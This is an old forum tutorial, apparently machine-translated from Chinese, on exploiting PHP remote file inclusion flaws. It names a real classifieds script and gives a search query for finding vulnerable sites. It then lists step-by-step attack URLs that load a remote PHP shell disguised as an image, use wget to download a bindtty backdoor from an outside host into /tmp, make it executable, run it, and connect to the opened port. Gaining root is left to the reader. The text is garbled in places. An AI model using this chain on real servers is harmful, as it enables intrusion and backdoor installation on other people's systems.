Forum Land Name: CRACKLOVE
Submitphone Address: cracklove@zj.com
Submit QQ number:
Copyright: The article is China Safety Net http://www.safechina.net and the author together, please indicate the source! !
Title: Remote files contain vulnerabilities
content:
▲ Remote file contains the use of vulnerabilities
*****************************
* Author: CRACKLOVE *
* EMA! L: CRACKLOVE # zj.com *
* HomePage: N / A, Maybe Down *
*****************************
1) What is the remote file contains a vulnerability?
Let's take a look at the following code first.
Include ($ PAGE);
?>
Because the $ PAGE variable lacks full filtering, it is determined whether the $ PAGE is on a local or remote server, so we can specify the file of the remote server as a parameter to $ Page variable,
Perform a remote file with web privileges.
2) Preliminary application of vulnerability
Assuming that INDEX.PHP code for a certain site is as follows
Include ($ PAGE);
?>
We can submit:
http://siteurl.tld/index.php?page = http: // Remote Server / File Name
Suppose the remote server Warez.php, the content is
System ("LS / TMP /");
?>
This will download the warez.php to the local, and execute! It is white, it is displayed in TMP.
3) Practical drill
Say a lot, now start exercising practice, hehe.
(1) Preparation:
1 There is a remote file containing a vulnerability site
2PHPSHELL
3BackDoor
For 1, everyone can pay attention to the recent vulnerability in www.securiteam.com, will be there, we will take the most close ArtMedic Kleinanzeigen vulnerabilities.
ArtMedic Kleinanzeigen lacks filtration due to INDEX.PHP's $ site variable, resulting in a remote file contains a vulnerability. So we can submit the following URL
http: // artmedic kleinanzeigen url / path / index.php? site = http: // phpshellurl
How do you find the site using ArtMedic Kleinanzeigen? There is a tip here, I will talk.
I will first go to ArtMedic Kleinanzeigen's official station to find the demonstration of ArtMedic KleinanzeiGen program, just click a connection,
Connection to
Http://siteurl.com/index.php?site=anzeigenmaerktestart, so
Search in www.google.com, search index.php? Site = anzeigenmaerktestart,
Those ones!
Use Artm
EDIC KLINANZEIGEN's station is almost out, we can try one by one!
For 2, I recommend Data Cha0s PHP Command / SafeMode Exploit 4.1, or Angel's SAPHPSHELL, PHPSPY, and features are good.
For 3, you can use the binding port program bind and then bind the port telnet to the program. You can use the Digit-Labs Connect-Backdoor used before SAN,
But I often use bindtty, bindtty to bind the 7474 port.
(2) starting
1 Submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id Description, cse.gif is the Data Cha0s PHP Command / SafeMode Exploit, which is above 4.1, cmd = ID is the privilege of querying the current user.
Generally all UID = 99 (Nobody) GID = 99 (Nobody) Groups = 99 (Nobody), the UID is not 0, so he is not a root level account.
It can be implemented, then the system function is not banned, then we can boldly execute the command!
2 submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -o / tmp / bindtty
This will download Bindtty to the TMP directory. Maybe you will be, why do you want to go down to the TMP directory? Because the TMP directory can be written.
3 The file has been downloaded, we must set the properties, otherwise it can not run, will prompt no permissions.
HTTP:!
//xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 / TMP / BINDTTTY
This way we have permission to execute the bindtty file!
4 execution bindtty
Http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
If it is successful, it will display daemon is starting ... OK, PID = XXXX.
Because the above has already said that bindtty is binding 7474 port, we can now Telnet Host 7474.
PS: It is not recommended to use the Windows command prompt for telnet, and the phenomenon of characters will appear, and PUTTY is recommended.
5 upgrade to root, this is your job. You can find the corresponding EXPLOIT in accordance with some of the information displayed in CSE.GIF.
This is almost over, and if there is a problem, please give it.
